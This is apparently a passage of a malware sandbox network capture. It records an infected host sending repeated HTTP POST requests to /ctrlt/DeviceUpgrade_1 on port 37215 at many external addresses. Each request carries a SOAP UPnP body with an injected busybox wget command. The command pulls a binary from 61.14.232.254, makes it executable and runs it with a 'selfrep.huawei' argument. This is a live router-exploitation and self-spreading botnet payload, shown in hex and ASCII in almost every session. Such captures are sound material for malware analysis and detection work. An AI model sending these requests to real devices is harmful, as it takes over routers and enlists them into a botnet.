20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2011192.168.2.135862641.65.177.5137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.687217951 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2012192.168.2.1334476157.142.71.9137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.687288046 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2013192.168.2.1359714197.97.216.2037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.687316895 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2014192.168.2.1349938157.36.107.8637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.687335968 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2015192.168.2.133648441.71.29.13337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.687800884 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2016192.168.2.1333880100.180.123.3737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.687844038 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2017192.168.2.1339834197.252.231.11537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.687868118 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2018192.168.2.1352520197.219.33.21637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.687897921 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2019192.168.2.134048214.233.85.18637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.687928915 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2020192.168.2.1344878197.71.218.10837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.687943935 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2021192.168.2.1335720157.27.117.22037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:24.687968969 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
